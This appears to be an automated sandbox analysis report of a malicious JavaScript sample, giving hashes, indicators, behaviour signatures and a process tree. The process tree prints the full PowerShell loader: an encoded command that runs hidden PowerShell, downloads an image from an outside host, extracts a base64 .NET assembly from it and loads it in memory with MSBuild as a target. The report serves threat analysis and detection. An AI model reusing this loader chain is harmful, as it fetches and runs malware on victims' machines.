Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
11-12-2024 02:40
Static task
static1
Behavioral task
behavioral1
Sample
5ebaadc4e362a1edba519f257315616eb0ffe4f42128d815c3aeada39569736c.js
Resource
win7-20241023-en
General
-
Target
5ebaadc4e362a1edba519f257315616eb0ffe4f42128d815c3aeada39569736c.js
-
Size
226KB
-
MD5
9e63c086b6be3311a1bdaed1267e34e3
-
SHA1
54a735620f68a8f91858058197bdf1336cc6d0ba
-
SHA256
5ebaadc4e362a1edba519f257315616eb0ffe4f42128d815c3aeada39569736c
-
SHA512
b377ae7cab1808ebfc38f7eb4fba7d50a401e60f700a5f8a6d3830eda9161f207624b95f49c09fda65f0261d30d5db622679e764bfb372015a350188f3f928dd
-
SSDEEP
6144:EGLdt3xLKZu3Y82AaRX5GLdt3xLKZurGLdt3xLKZu3Y82AaRX5GLdt3xLKZua:rLvhLKjZACULvhLKdLvhLKjZACULvhLE
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2344 powershell.exe 7 2344 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2052 powershell.exe 2344 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2052 powershell.exe 2344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2536 wrote to memory of 2052 2536 wscript.exe 30 PID 2536 wrote to memory of 2052 2536 wscript.exe 30 PID 2536 wrote to memory of 2052 2536 wscript.exe 30 PID 2052 wrote to memory of 2344 2052 powershell.exe 32 PID 2052 wrote to memory of 2344 2052 powershell.exe 32 PID 2052 wrote to memory of 2344 2052 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\5ebaadc4e362a1edba519f257315616eb0ffe4f42128d815c3aeada39569736c.js1⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $proofread = 'JABlAHgAbwBkAGUAcgBtAGkAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAeQB0AGYAbAB0ADYAMQBuAC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADMAMQAzADQAOQA0ADcALwBiAGsAbABwAHkAcwBlAHkAZQB1AHQANABpAG0AcAB3ADUAMABuADEALgBqAHAAZwAgACcAOwAkAHAAZQBkAGUAcwB0AGEAbABsAGUAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGEAeABpAG0AYQBsAGkAcwB0ACAAPQAgACQAcABlAGQAZQBzAHQAYQBsAGwAZQBkAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGUAeABvAGQAZQByAG0AaQBzACkAOwAkAGQAZQBiAGkAbABpAHQAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABtAGEAeABpAG0AYQBsAGkAcwB0ACkAOwAkAGkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAYwBhAGwAawBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAbwBwAGUAcgBhAHQAaQB2AGUAbAB5ACAAPQAgACQAZABlAGIAaQBsAGkAdABpAGUAcwAuAEkAbgBkAGUAeABPAGYAKAAkAGkAbgB0AGUAcgBhAGMAdABpAHYAZQApADsAJABtAG8AYgBjAGEAcABzACAAPQAgACQAZABlAGIAaQBsAGkAdABpAGUAcwAuAEkAbgBkAGUAeABPAGYAKAAkAGMAYQBsAGsAZQByACkAOwAkAG8AcABlAHIAYQB0AGkAdgBlAGwAeQAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAG0AbwBiAGMAYQBwAHMAIAAtAGcAdAAgACQAbwBwAGUAcgBhAHQAaQB2AGUAbAB5ADsAJABvAHAAZQByAGEAdABpAHYAZQBsAHkAIAArAD0AIAAkAGkAbgB0AGUAcgBhAGMAdABpAHYAZQAuAEwAZQBuAGcAdABoADsAJAB3AGUAbABkAGUAcgBzACAAPQAgACQAbQBvAGIAYwBhAHAAcwAgAC0AIAAkAG8AcABlAHIAYQB0AGkAdgBlAGwAeQA7ACQAdABvAG4AZQBhAHIAbQAgAD0AIAAkAGQAZQBiAGkAbABpAHQAaQBlAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAbwBwAGUAcgBhAHQAaQB2AGUAbAB5ACwAIAAkAHcAZQBsAGQAZQByAHMAKQA7ACQAaABvAG4AbwByAGEAcgBpAGwAeQAgAD0AIAAtAGoAbwBpAG4AIAAoACQAdABvAG4AZQBhAHIAbQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAdABvAG4AZQBhAHIAbQAuAEwAZQBuAGcAdABoACkAXQA7ACQAdwByAGkAdABoAGUAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABoAG8AbgBvAHIAYQByAGkAbAB5ACkAOwAkAG0AaQBjAHIAbwBsAGkAdABlAHIAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB3AHIAaQB0AGgAZQBuACkAOwAkAHcAbwBvAGQAZQBuAG4AZQBzAHMAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApADsAJAB3AG8AbwBkAGUAbgBuAGUAcwBzAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnAHQAeAB0AC4AcwBiAGsALwB2AGUAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ADUAYgAxAGIAYwAwAGQANAA1AGIANgAzADIAZQBiADkAZQBlADYAMgAtAGIAdQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAgACcAJABkAG8AdQBnAGgAdABpAG4AZQBzAHMAJwAsACAAJwAkAGQAbwB1AGcAaAB0AGkAbgBlAHMAcwAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwAkAGQAbwB1AGcAaAB0AGkAbgBlAHMAcwAnACwAIAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnADEAJwAsACcAJABkAG8AdQBnAGgAdABpAG4AZQBzAHMAJwApACkAOwA=';$tonemes = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($proofread));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $tonemes2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$exodermis = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$pedestalled = New-Object System.Net.WebClient;$maximalist = $pedestalled.DownloadData($exodermis);$debilities = [System.Text.Encoding]::UTF8.GetString($maximalist);$interactive = '<<BASE64_START>>';$calker = '<<BASE64_END>>';$operatively = $debilities.IndexOf($interactive);$mobcaps = $debilities.IndexOf($calker);$operatively -ge 0 -and $mobcaps -gt $operatively;$operatively += $interactive.Length;$welders = $mobcaps - $operatively;$tonearm = $debilities.Substring($operatively, $welders);$honorarily = -join ($tonearm.ToCharArray() | ForEach-Object { $_ })[-1..-($tonearm.Length)];$writhen = [System.Convert]::FromBase64String($honorarily);$microliters = [System.Reflection.Assembly]::Load($writhen);$woodenness = [dnlib.IO.Home].GetMethod('VAI');$woodenness.Invoke($null, @('txt.sbk/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth', '$doughtiness', '$doughtiness', '$doughtiness', 'MSBuild', '$doughtiness', '$doughtiness','$doughtiness','$doughtiness','$doughtiness','$doughtiness','$doughtiness','1','$doughtiness'));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e7f7aa39313f40a1163ed6b8e66482ff
SHA1f186a03ccb0adf911452471fdbdb0fd46daeeb4a
SHA2562449d77b207efe6ac8eecd54a4c7845456775d0244e088226044765b1bd3370b
SHA5124de079071c94d357afa35c54dc145883b571d2393a7be86f31a8b9129287db4d635c55ed6d88cbca3c3e63a17257f58f72085fb4d5d8c51a9aecd43eeda2cb08